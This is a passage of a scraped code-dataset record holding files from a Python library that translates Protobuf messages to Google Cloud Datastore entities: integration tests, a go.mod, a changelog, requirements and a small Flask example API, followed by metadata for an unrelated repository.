translating it to Entity object\n key_translated = self.client.key('ExampleModel', 'translated_entity_populated')\n example_pb = EXAMPLE_PB_POPULATED\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n\n # pylint: disable=no-member\n entity_pb_translated.key.CopyFrom(key_translated.to_protobuf())\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb_translated)\n self.client.put(entity_translated)\n\n # Verify that the translated entity results in the same end result as using native\n # entity object\n entity_translated_retrieved = self.client.get(key_translated)\n\n self.assertTrue(entity_translated_retrieved.key != entity_native_retrieved.key)\n\n # NOTE: key won't be the same so we clear it\n entity_translated_retrieved.key = None\n entity_native_retrieved.key = None\n\n self.assertEqual(entity_translated_retrieved, entity_native_retrieved)\n\n # If we translate retrieved entity back to the original Protobuf object definition, it\n # should be the same as the original model (minus the key since the original model doesn't\n # contain a key)\n entity_pb_retrieved = datastore.helpers.entity_to_protobuf(entity_translated_retrieved)\n entity_pb_translated.ClearField('key')\n self.assertEqual(entity_pb_translated, entity_pb_retrieved)\n\n example_pb_retrieved = entity_pb_to_model_pb(example_pb2.ExampleDBModel,\n entity_pb_retrieved)\n self.assertEqual(example_pb_retrieved, example_pb)\n\n def test_store_and_retrieve_default_values_and_translated_object_from_datastore(self):\n # type: () -> None\n key_native = self.client.key('ExampleModel', 'native_entity_default_values')\n\n entity_native = datastore.Entity(key=key_native)\n entity_native.update(EXAMPLE_DICT_DEFAULT_VALUES)\n self.client.put(entity_native)\n\n entity_native_retrieved = self.client.get(key_native)\n self.assertTrue(entity_native_retrieved)\n\n # Verify retrieved data matches the original input\n self.assertEqual(entity_native_retrieved, EXAMPLE_DICT_DEFAULT_VALUES)\n\n # Store custom Protobuf object in a datastore by translating it to Entity object\n key_translated = self.client.key('ExampleModel', 'translated_entity_default_values')\n example_pb = EXAMPLE_PB_DEFAULT_VALUES\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n # pylint: disable=no-member\n entity_pb_translated.key.CopyFrom(key_translated.to_protobuf())\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb_translated)\n self.client.put(entity_translated)\n\n # Verify that the translated entity results in the same end result as using native\n # entity object\n entity_translated_retrieved = self.client.get(key_translated)\n\n self.assertTrue(entity_translated_retrieved.key != entity_native_retrieved.key)\n\n # NOTE: key won't be the same so we clear it\n entity_translated_retrieved.key = None\n entity_native_retrieved.key = None\n\n self.assertEqual(entity_translated_retrieved, entity_native_retrieved)\n\n # If we translate retrieved entity back to the original Protobuf object definition, it\n # should be the same as the original model (minus the key since the original model doesn't\n # contain a key)\n entity_pb_retrieved = datastore.helpers.entity_to_protobuf(entity_translated_retrieved)\n entity_pb_translated.ClearField('key')\n self.assertEqual(entity_pb_translated, entity_pb_retrieved)\n\n example_pb_retrieved = entity_pb_to_model_pb(example_pb2.ExampleDBModel,\n entity_pb_retrieved)\n self.assertEqual(example_pb_retrieved, example_pb)\n\n # Storing and retrieving empty object should have the same end result\n key_native_empty = self.client.key('ExampleModel', 'native_entity_empty')\n\n entity_native_empty = datastore.Entity(key=key_native_empty)\n entity_native_empty.update({})\n self.client.put(entity_native_empty)\n\n entity_native_empty_retrieved = self.client.get(key_native_empty)\n self.assertTrue(entity_native_empty_retrieved is not None)\n\n # Verify retrieved data matches the original input\n self.assertEqual(entity_native_empty_retrieved, {})\n\n # Store custom Protobuf object in a datastore by translating it to Entity object\n key_translated_empty = self.client.key('ExampleModel', 'translated_entity_empty')\n example_pb = example_pb2.ExampleDBModel()\n entity_pb_translated_empty = model_pb_to_entity_pb(model_pb=example_pb)\n # pylint: disable=no-member\n entity_pb_translated_empty.key.CopyFrom(key_translated_empty.to_protobuf())\n entity_translated_empty = datastore.helpers.entity_from_protobuf(entity_pb_translated_empty)\n self.client.put(entity_translated_empty)\n\n # Verify that the translated entity results in the same end result as using native\n # entity object\n entity_translated_empty_retrieved = self.client.get(key_translated_empty)\n\n self.assertTrue(entity_translated_empty_retrieved.key != entity_native_empty_retrieved.key)\n\n # NOTE: key won't be the same so we clear it\n entity_translated_empty_retrieved.key = None\n entity_native_empty_retrieved.key = None\n\n # self.assertEqual(entity_translated_empty_retrieved, entity_native_empty_retrieved)\n # return\n\n # If we translate retrieved entity back to the original Protobuf object definition, it\n # should be the same as the original model (minus the key since the original model doesn't\n # contain a key)\n entity_pb_empty_retrieved = \\\n datastore.helpers.entity_to_protobuf(entity_translated_empty_retrieved)\n entity_pb_translated_empty.ClearField('key')\n entity_pb_empty_retrieved.ClearField('key')\n\n self.assertEqual(entity_pb_translated_empty, entity_pb_empty_retrieved)\n\n example_pb_empty_retrieved = entity_pb_to_model_pb(example_pb2.ExampleDBModel,\n entity_pb_empty_retrieved)\n self.assertEqual(example_pb_empty_retrieved, example_pb)\n\n def test_model_pb_to_entity_pb_exclude_from_index_fields(self):\n # type: () -> None\n example_pb = example_pb2.ExampleDBModel()\n example_pb.int32_key = 100\n example_pb.string_key = 'string bar'\n example_pb.bytes_key = b'foobarbytes'\n example_pb.enum_key = 1 # type: ignore\n\n # No exclude from index provided\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb)\n self.assertEqual(entity_translated.exclude_from_indexes, set([]))\n\n entity_translated.key = self.client.key('ExampleModel', 'exclude_from_indexes_1')\n self.client.put(entity_translated)\n\n entity_translated_retrieved = self.client.get(entity_translated.key)\n self.assertEqual(entity_translated, entity_translated_retrieved)\n\n # Exclude from index provided for some fields\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb,\n exclude_from_index=['int32_key', 'bytes_key'])\n\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb)\n self.assertEqual(entity_translated.exclude_from_indexes, set(['int32_key', 'bytes_key']))\n\n entity_translated.key = self.client.key('ExampleModel', 'exclude_from_indexes_2')\n self.client.put(entity_translated)\n\n entity_translated_retrieved = self.client.get(entity_translated.key)\n self.assertEqual(entity_translated, entity_translated_retrieved)\n\n def test_model_pb_to_entity_pb_exclude_from_index_custom_extension_model_without_package(self):\n # type: () -> None\n from tests.generated import example_with_options_pb2\n\n model_pb = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb.string_key_one = 'one'\n model_pb.string_key_two = 'two'\n model_pb.string_key_three = 'three'\n model_pb.string_key_four = 'four'\n model_pb.int32_field_one = 111\n model_pb.int32_field_two = 222\n\n entity_pb = model_pb_to_entity_pb(model_pb=model_pb)\n\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb)\n self.assertEqual(entity_translated.exclude_from_indexes,\n set(['string_key_one', 'int32_field_two', 'string_key_three']))\n\n entity_translated.key = self.client.key('ExampleModelWithOptions', 'exclude_from_index_1')\n self.client.put(entity_translated)\n\n entity_translated_retrieved = self.client.get(entity_translated.key)\n self.assertEqual(entity_translated, entity_translated_retrieved)\n\n def test_model_pb_to_entity_pb_exclude_from_index_custom_extension_model_with_package(self):\n # type: () -> None\n from tests.generated.models import example_with_options_pb2\n\n model_pb = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb.string_key_one = 'one'\n model_pb.string_key_two = 'two'\n model_pb.string_key_three = 'three'\n model_pb.string_key_four = 'four'\n model_pb.int32_field_one = 111\n model_pb.int32_field_two = 222\n\n entity_pb = model_pb_to_entity_pb(model_pb=model_pb)\n\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb)\n self.assertEqual(entity_translated.exclude_from_indexes,\n set(['string_key_one', 'int32_field_two', 'string_key_three']))\n\n entity_translated.key = self.client.key('ExampleModelWithOptions', 'exclude_from_index_1')\n self.client.put(entity_translated)\n\n entity_translated_retrieved = self.client.get(entity_translated.key)\n self.assertEqual(entity_translated, entity_translated_retrieved)\n" }, { "alpha_fraction": 0.6556603908538818, "alphanum_fraction": 0.8066037893295288, "avg_line_length": 25.5, "blob_id": "4e9545a01919648bb03352dd9128df1008ffeee1", "content_id": "93dabf2987a1de8284d5a337b033c2e8683e1227", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 212, "license_type": "permissive", "max_line_length": 91, "num_lines": 8, "path": "/tests/generated/go/go.mod", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "module github.com/Kami/python-protobuf-cloud-datastore-entity-translator/tests/generated/go\n\ngo 1.12\n\nrequire (\n\tgithub.com/golang/protobuf v1.3.2\n\tgoogle.golang.org/genproto v0.0.0-20190716160619-c506a9f90610\n)\n" }, { "alpha_fraction": 0.6965789198875427, "alphanum_fraction": 0.7397368550300598, "avg_line_length": 36.25490188598633, "blob_id": "0c7829e9202711e5dc5434df097c1f5688224761", "content_id": "ecd6a7f12f6ba45084ed900f0f6de675de5bfcbb", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3800, "license_type": "permissive", "max_line_length": 80, "num_lines": 102, "path": "/CHANGES.md", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# v0.1.13 - September 25th, 2019\n\n* Fix a bug so number values are correctly handled inside Struct fields.\n\n Struct field value mimics JSON types which means that for numbers, it\n only supports JSON \"number\" type which is a double. This means we need\n to correctly handle all the numbers (integers and doubles) inside\n Structs and cast them to double type. #24\n\n# v0.1.12 - September 24th, 2019\n\n* Fix a bug with boolean values inside Struct fields not being handled and\n serialized correctly (they were serialized as integer instead of boolean\n value). #23\n\n Reported by @Sheshagiri\n\n# v0.1.11 - September 9th, 2019\n\n* Fix ``model_pb_to_entity_pb`` to correctly handle deeply nested Struct types\n with empty array values. #22\n\n# v0.1.10 - September 4th, 2019\n\n* Fix ``entity_pb_to_model_pb`` to correctly handle repeated Struct field types\n (aka array of Structs). #21 #20\n\n# v0.1.9 - August 29th, 2019\n\n- Internal code optimizations and add new\n ``utils.get_exclude_from_index_fields_for_model`` utility method. #19\n\n# v0.1.8 - August 28th, 2019\n\n- Fix ``exclude_from_index`` Protobuf field option functionality so it works\n correctly when field option extension is defined inside a Protobuf file which\n is part of a package.\n\n NOTE: In such scenario, definitions for other Protobuf datastore models need\n to be part of the same package. #18\n\n# v0.1.7 - August 27th, 2019\n\n- Add support for declaring which model fields are to be excluded from the\n index by specifying a custom ``exclude_from_index`` field option directly\n on the Protobuf message model field.\n\n For more information and example usage, please refer to the README. #17\n\n# v0.1.6 - August 21th, 2019\n\n- Fix a bug with ``model_pb_to_entity_pb`` method not correctly handling\n ``null`` values for nested ``google.protobuf.Struct`` fields. #16\n\n# v0.1.5 - August 16th, 2019\n\n- Add support for new ``exclude_from_index`` argument to the\n ``model_pb_to_entity_pb`` and ``model_pb_with_key_to_entity_pb`` method.\n With this argument, user can specify a list of model / entity fields which\n won't be indexed. #15\n\n# v0.1.4 - July 29th, 2019\n\n- Fix dynamic module import handling for referenced messages inside\n ``entity_pb_to_model_pb`` and make sure we don't try to import a\n module again if it's already imported under a different name (aka alias). #14\n- Fix ``entity_pb_to_model_pb`` so it correctly handles messages with a custom\n referenced type which contains a struct field. #14\n\n# v0.1.3 - July 28th, 2019\n\n- Update ``model_pb_to_entity_pb`` method so it always explicitly sets a\n default value on the translated Entity Protobuf object for repeated fields\n which reference another Protobuf message with enum field type. #12\n- Fix ``setup.py``, make sure installation works correctly under Python 2.7\n and Python >= 3.6. #13\n- Add cross programming language compatibility tests which verify that the\n output of Python and Go translator library is exactly the same. #13\n\n# v0.1.2 - June 16th, 2019\n\n- Update ``model_pb_to_entity_pb`` method so it also includes empty array\n values on the translated Entity Protobuf object. This way it's consistent\n with other complex types (empty maps, etc). #11\n\n# v0.1.1 - June 11th, 2019\n\n- Implement support for ``geo_point_value`` and ``google.type.LatLng`` field\n type.\n\n Now all the field types which are supported by Google Datastore are also\n supported by this library. #9\n\n# v0.1.0 - June 5th, 2019\n\n- Initial release which exposes the following public functions:\n\n - ``model_pb_to_entity_pb`` for translating custom Protobuf object into Entity\n Protobuf object which can be used with Google Datastore.\n\n - ``entity_pb_to_model_pb`` for translating Entity Protobuf object as returned\n by Google Datastore into a custom user-defined Protobuf object.\n" }, { "alpha_fraction": 0.8611111044883728, "alphanum_fraction": 0.8611111044883728, "avg_line_length": 11, "blob_id": "2064e430880fa0995bac23dc2d4e2b5b85084ee8", "content_id": "a097ae643989ee942298939403bf6218a3445115", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 36, "license_type": "permissive", "max_line_length": 22, "num_lines": 3, "path": "/requirements.txt", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "six\nprotobuf\ngoogle-cloud-datastore\n" }, { "alpha_fraction": 0.6938053369522095, "alphanum_fraction": 0.7014749050140381, "avg_line_length": 30.98113250732422, "blob_id": "c1a15b2465b1a2ce8340c1cac954fa2dbffc7020", "content_id": "db3fccc9056bb67165bb1b87e51497f8c4a7120d", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3390, "license_type": "permissive", "max_line_length": 99, "num_lines": 106, "path": "/examples/http_api.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nSimple HTTP server which allows users to retrieve and store arbitrary Protobuf objects inside Cloud\nDatastore.\n\nTo run it:\n\n$ PYTHONPATH=. gunicorn examples/http_api.py:app\n\"\"\"\n\nfrom typing import Tuple\nfrom typing import Dict\n\nfrom flask import Flask\nfrom flask import request\n\nfrom google.protobuf import json_format\nfrom google.cloud import datastore\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\nfrom protobuf_cloud_datastore_translator.utils import get_module_and_class_for_model_name\n\napp = Flask(__name__)\n\n\n@app.route('/datastore/put/<key>', methods=['POST'])\ndef put_db_object(key):\n # type: (str) -> Tuple[str, int, Dict[str, str]]\n \"\"\"\n Store arbitrary Protobuf object in Google Datastore.\n\n NOTE: Request body needs to contain Protobuf model serialized as JSON.\n \"\"\"\n body = request.get_json()\n\n # Fully qualified model name, e.g. \"tests.generated.example_pb2.ExampleDBModel\"\n # NOTE: This module needs to be available in PYTHONPATH\n model_name = body['model_name']\n model_data = body['json_string']\n\n _, model_class = get_module_and_class_for_model_name(model_name=model_name)\n\n model_pb = json_format.Parse(model_data, model_class())\n\n # 2. Convert it into entity object\n entity_pb = model_pb_to_entity_pb(model_pb)\n\n client = datastore.Client()\n\n # Set PK on the object\n key_pb = client.key(model_pb.DESCRIPTOR.name, key).to_protobuf()\n entity_pb.key.CopyFrom(key_pb) # pylint: disable=no-member\n\n # 3. Store it inside datastore\n entity = datastore.helpers.entity_from_protobuf(entity_pb)\n client.put(entity)\n return '', 200, {}\n\n\n@app.route('/datastore/get/<key>')\ndef get_db_object(key):\n # type: (str) -> Tuple[str, int, Dict[str, str]]\n \"\"\"\n Retrieve object from Google Datastore, serialize it into native object type and serialize it\n as JSON.\n \"\"\"\n model_name = request.args.get('model_name', '')\n raw = request.args.get('raw', 'false').lower() in ['1', 'true', 'yes']\n _, model_class = get_module_and_class_for_model_name(model_name=model_name)\n\n class_name = model_class.DESCRIPTOR.name\n\n # 1. Retrieve Entity from datastore\n client = datastore.Client()\n\n key = client.key(class_name, key)\n entity = client.get(key)\n\n # 2. Translate it to custom Protobuf object\n entity_pb = datastore.helpers.entity_to_protobuf(entity)\n\n if not raw:\n model_pb = entity_pb_to_model_pb(model_pb_class=model_class, entity_pb=entity_pb)\n else:\n model_pb = entity_pb\n\n # 3. Serialize it to JSON\n model_pb_json = json_format.MessageToJson(model_pb)\n\n return model_pb_json, 200, {'Content-Type': 'application/json'}\n" } ]
30
MuhammadYasir1/Image-Classification-using-Deep-Learning-in-Pytorch
https://github.com/MuhammadYasir1/Image-Classification-using-Deep-Learning-in-Pytorch
1331ce9d39f7947ac6725bec15eb7811ec9e9d36
8bb1e63a0332ec7f390259e1f8251d507bd2eb04
770b09b266310331d5a06d29ce7f230b06b02a85
refs/heads/master
2022-11-18T06:49:30.032003
2020-07-16T15:46:21
2020-07-16T15:46:21
279,957,504
1
0
MIT
2020-07-15T19:21:34
2020-07-15T19:27:26
2020-07-15T19:33:41
HTML
[ { "alpha_fraction": 0.5913413166999817, "alphanum_fraction": 0.6119869947433472, "avg_line_length": 32.86016845703125, "blob_id": "217451eb2beadff0833ac70ed710d4ec80c7f03b", "content_id": "a92a8bd55c49eef8b600e3b4ef3418515e4a910f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7992, "license_type": "permissive", "max_line_length": 135, "num_lines": 236, "path": "/train.py", "repo_name": "MuhammadYasir1/Image-Classification-using-Deep-Learning-in-Pytorch", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 16 20:44:14 2020\n\n@author: muhammadyasir\n\"\"\"\n# load libraries\nimport pandas as pd\nimport numpy as np\n\nimport torch\nfrom torch import nn, optim\nfrom torch.optim import lr_scheduler\n\nimport torchvision\nfrom torchvision import datasets, transforms, models\n\nfrom collections import OrderedDict\nfrom os import listdir\nimport time\nimport copy\nimport argparse\n\n# Initiate variables with default values\narch = 'vgg16'\nhidden_units = 5120\nlearning_rate = 0.001\nepochs = 10\ndevice = 'cpu'\n\n# Set up parameters for entry in command line\nparser = argparse.ArgumentParser()\nparser.add_argument('data_dir',type=str, help='Location of directory with data for image classifier to train and test')\nparser.add_argument('-a','--arch',action='store',type=str, help='Choose among 3 pretrained networks - vgg16, alexnet, and densenet121')\nparser.add_argument('-H','--hidden_units',action='store',type=int, help='Select number of hidden units for 1st layer')\nparser.add_argument('-l','--learning_rate',action='store',type=float, help='Choose a float number as the learning rate for the model')\nparser.add_argument('-e','--epochs',action='store',type=int, help='Choose the number of epochs you want to perform gradient descent')\nparser.add_argument('-s','--save_dir',action='store', type=str, help='Select name of file to save the trained model')\nparser.add_argument('-g','--gpu',action='store_true',help='Use GPU if available')\n\nargs = parser.parse_args()\n\n# Select parameters entered in command line\nif args.arch:\n arch = args.arch\nif args.hidden_units:\n hidden_units = args.hidden_units\nif args.learning_rate:\n learning_rate = args.learning_rate\nif args.epochs:\n epochs = args.epochs\nif args.gpu: \n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\ndef create_model(arch='vgg16',hidden_units=5120,learning_rate=0.001):\n '''\n Function builds model\n '''\n # Select from available pretrained models\n model = getattr(models,arch)(pretrained=True)\n in_features = model.classifier[0].in_features\n \n #Freeze feature parameters so as not to backpropagate through them\n for param in model.parameters():\n param.requires_grad = False\n \n # Build classifier for model\n classifier = nn.Sequential(OrderedDict([\n ('fc1',nn.Linear(in_features,hidden_units)),\n ('ReLu1',nn.ReLU()),\n ('Dropout1',nn.Dropout(p=0.15)),\n ('fc2',nn.Linear(hidden_units,512)),\n ('ReLu2',nn.ReLU()),\n ('Dropout2',nn.Dropout(p=0.15)),\n ('fc3',nn.Linear(512,102)),\n ('output',nn.LogSoftmax(dim=1))\n ]))\n\n model.classifier = classifier\n \n criterion = nn.NLLLoss()\n optimizer = optim.Adam(model.classifier.parameters(),lr=learning_rate)\n scheduler = lr_scheduler.StepLR(optimizer,step_size=4,gamma=0.1,last_epoch=-1)\n \n return model, criterion, optimizer, scheduler\n\nmodel, criterion, optimizer, scheduler = create_model(arch, hidden_units, learning_rate)\n\nprint(\"-\" * 10)\nprint(\"Your model has been built!\")\n\n# Directory location of images\ndata_dir = args.data_dir\ntrain_dir = data_dir + '/train'\nvalid_dir = data_dir + '/valid'\ntest_dir = data_dir + '/test'\n\n#Define transforms for training and validation sets and normalize images\ndata_transforms = {\n 'train': transforms.Compose([\n transforms.RandomRotation(45),\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n 'valid': transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n}\n\n# Dictionary holding location of training and validation data\ndata_dict = {'train':train_dir,\n 'valid': valid_dir}\n\n# Images are loaded with ImageFolder and transformations applied\nimage_datasets = {x: datasets.ImageFolder(data_dict[x],transform = data_transforms[x])\n for x in ['train', 'valid']}\n\ndataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=64,shuffle=True) \n for x in ['train', 'valid']}\n\n# Variable used in calculating trining and validation accuracies\ndataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']}\n\n# Variable holding names for classes\nclass_names = image_datasets['train'].classes\n \ndef train_model(model, criterion, optimizer, scheduler, epochs=2):\n '''\n Function that trains pretrained model and classifier on image dataset and validates.\n '''\n since = time.time()\n model.to(device)\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n\n for epoch in range(epochs):\n print('-' * 10)\n print('Epoch {}/{}'.format(epoch + 1, epochs))\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'valid']:\n if phase == 'train':\n scheduler.step()\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate over data.\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n\n # statistics\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n\n print('{} loss: {:.4f} Acc: {:.4f}'.format(\n phase, epoch_loss, epoch_acc))\n\n # deep copy the model\n if phase == 'valid' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n print()\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best valid Acc: {:.4f}'.format(best_acc))\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model\n\nmodel_trained = train_model(model, criterion, optimizer, scheduler, epochs)\n\nprint('-' * 10)\nprint('Your model has been successfully trained')\nprint('-' * 10)\n\ndef save_model(model_trained):\n '''\n Function saves the trained model architecture.\n '''\n model_trained.class_to_idx = image_datasets['train'].class_to_idx\n model_trained.cpu()\n save_dir = ''\n checkpoint = {\n 'arch': arch,\n 'hidden_units': hidden_units, \n 'state_dict': model_trained.state_dict(),\n 'class_to_idx': model_trained.class_to_idx,\n }\n \n if args.save_dir:\n save_dir = args.save_dir\n else:\n save_dir = 'checkpoint.pth'\n\n torch.save(checkpoint, save_dir) \n \nsave_model(model_trained)\nprint('-' * 10)\nprint(model_trained)\nprint('Your model has been successfully saved.')\nprint('-' * 10)\n\n" }, { "alpha_fraction": 0.609343409538269, "alphanum_fraction": 0.6321500539779663, "avg_line_length": 29.550561904907227, "blob_id": "01e1ca1e9034ff486cb03be9be941ab0e6aea47e", "content_id": "8687340ffc37d996b62683f84124973c7acd6400", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5437, "license_type": "permissive", "max_line_length": 134, "num_lines": 178, "path": "/predict.py", "repo_name": "MuhammadYasir1/Image-Classification-using-Deep-Learning-in-Pytorch", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 16 20:43:00 2020\n\n@author: muhammadyasir\n\"\"\"\n\n\n#load libraries\nimport pandas as pd\nimport numpy as np\n\nimport torch\nfrom torch import nn, optim\nfrom torch.optim import lr_scheduler\n\nimport torchvision\nfrom torchvision import datasets, transforms, models\n\nfrom collections import OrderedDict\nfrom PIL import Image\nfrom os import listdir\nimport json\nimport argparse\n\n# Initiate variables with default values\ncheckpoint = 'checkpoint.pth'\nfilepath = 'cat_to_name.json' \narch=''\nimage_path = 'flowers/test/100/image_07896.jpg'\ntopk = 5\n\n# Set up parameters for entry in command line\nparser = argparse.ArgumentParser()\nparser.add_argument('-c','--checkpoint', action='store',type=str, help='Name of trained model to be loaded and used for predictions.')\nparser.add_argument('-i','--image_path',action='store',type=str, help='Location of image to predict e.g. flowers/test/class/image')\nparser.add_argument('-k', '--topk', action='store',type=int, help='Select number of classes you wish to see in descending order.')\nparser.add_argument('-j', '--json', action='store',type=str, help='Define name of json file holding class names.')\nparser.add_argument('-g','--gpu', action='store_true', help='Use GPU if available')\n\nargs = parser.parse_args()\n\n# Select parameters entered in command line\nif args.checkpoint:\n checkpoint = args.checkpoint\nif args.image_path:\n image_path = args.image_path\nif args.topk:\n topk = args.topk\nif args.json:\n filepath = args.json\nif args.gpu:\n torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n \nwith open(filepath, 'r') as f:\n cat_to_name = json.load(f)\n\ndef load_model(checkpoint_path):\n '''\n load model from a checkpoint\n '''\n checkpoint = torch.load(checkpoint_path)\n \n if checkpoint['arch'] == 'vgg16':\n model = models.vgg16(pretrained=True)\n in_features = 25088\n for param in model.parameters():\n param.requires_grad = False\n elif checkpoint['arch'] == 'alexnet':\n model = models.alexnet(pretrained=True)\n in_features = 9216\n for param in model.parameters():\n param.requires_grad = False\n elif checkpoint['arch'] == 'densenet121':\n model = models.densenet121(pretrained=True)\n in_features = 1024\n for param in model.parameters():\n param.requires_grad = False\n else:\n print('Sorry base architecture not recognised')\n \n model.class_to_idx = checkpoint['class_to_idx']\n hidden_units = checkpoint['hidden_units']\n \n classifier = nn.Sequential(OrderedDict([\n ('fc1',nn.Linear(in_features,hidden_units)),\n ('ReLu1',nn.ReLU()),\n ('Dropout1',nn.Dropout(p=0.15)),\n ('fc2',nn.Linear(hidden_units,512)),\n ('ReLu2',nn.ReLU()),\n ('Dropout2',nn.Dropout(p=0.15)),\n ('fc3',nn.Linear(512,102)),\n ('output',nn.LogSoftmax(dim=1))\n ])) \n \n model.classifier = classifier\n model.load_state_dict(checkpoint['state_dict'])\n \n return model\n\n\ndef process_image(image_path):\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\n returns an Numpy array\n '''\n \n # Process a PIL image for use in a PyTorch model\n size = 256, 256\n crop_size = 224\n \n im = Image.open(image_path)\n \n im.thumbnail(size)\n\n left = (size[0] - crop_size)/2\n top = (size[1] - crop_size)/2\n right = (left + crop_size)\n bottom = (top + crop_size)\n\n im = im.crop((left, top, right, bottom))\n \n np_image = np.array(im)\n np_image = np_image/255\n \n means = [0.485, 0.456, 0.406]\n stds = [0.229, 0.224, 0.225]\n \n np_image = (np_image - means) / stds\n pytorch_np_image = np_image.transpose(2,0,1)\n \n return pytorch_np_image\n\ndef predict(image_path, model, topk=5):\n ''' Predict the class (or classes) of an image using a trained deep learning model.\n '''\n \n # Use process_image function to create numpy image tensor\n pytorch_np_image = process_image(image_path)\n \n # Changing from numpy to pytorch tensor\n pytorch_tensor = torch.tensor(pytorch_np_image)\n pytorch_tensor = pytorch_tensor.float()\n \n # Removing RunTimeError for missing batch size - add batch size of 1 \n pytorch_tensor = pytorch_tensor.unsqueeze(0)\n \n # Run model in evaluation mode to make predictions\n model.eval()\n LogSoftmax_predictions = model.forward(pytorch_tensor)\n predictions = torch.exp(LogSoftmax_predictions)\n \n # Identify top predictions and top labels\n top_preds, top_labs = predictions.topk(topk)\n \n \n top_preds = top_preds.detach().numpy().tolist()\n \n top_labs = top_labs.tolist()\n \n labels = pd.DataFrame({'class':pd.Series(model.class_to_idx),'flower_name':pd.Series(cat_to_name)})\n labels = labels.set_index('class')\n labels = labels.iloc[top_labs[0]]\n labels['predictions'] = top_preds[0]\n \n return labels\n\nmodel = load_model(checkpoint) \n\nprint('-' * 40)\n\nprint(model)\nprint('The model being used for the prediction is above.')\ninput(\"When you are ready - press Enter to continue to the prediction.\")\nlabels = predict(image_path,model,topk)\nprint('-' * 40)\nprint(labels)\nprint('-' * 40)" } ]
2
clayliau/Full-Stack-Foundations
https://github.com/clayliau/Full-Stack-Foundations
427467f747056f6f78a03736e4b46b8214114a1a
0180108e2900019526a92423fcaa62454c258a61
ba9ff711f73391ff5815427df447afdb65501c59
refs/heads/master
2021-01-21T10:26:16.161068
2019-07-13T14:06:55
2019-07-13T14:06:55
83,430,853
0
0
null
2017-02-28T12:39:18
2017-02-26T04:24:24
2017-02-02T02:50:47
null
